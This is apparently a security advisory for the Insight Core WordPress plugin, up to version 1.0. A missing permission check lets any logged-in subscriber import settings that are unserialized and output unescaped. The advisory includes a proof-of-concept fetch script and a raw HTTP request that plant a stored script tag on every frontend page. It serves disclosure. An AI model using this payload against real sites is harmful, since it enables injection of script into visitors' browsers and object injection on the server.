Insight Core <= 1.0 - Subscriber+ PHP Object Injection & Stored XSS

2021-12-2800:00:00

Krzysztof Zając

insight core

php

object injection

stored xss

frontend pages

security exploit

EPSS

0.001

Percentile

24.8%

JSON

The plugin does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks

let formData = new FormData;
formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}']))
formData.append('action', 'insight_customizer_options_import');
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "body": formData,
  "method": "POST"
})
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771
Content-Length: 458
Connection: close
Cookie: [any authenticated user]

-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="import-file"; filename="blob"
Content-Type: application/octet-stream

a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="action"

insight_customizer_options_import
-----------------------------189498983625966260651015514771--


The XSS will be triggered in all frontend pages

EPSS

0.001

Percentile

24.8%

JSON

Related for WPEX-ID:01D430EA-EF85-4529-9AE4-C1F70016BB75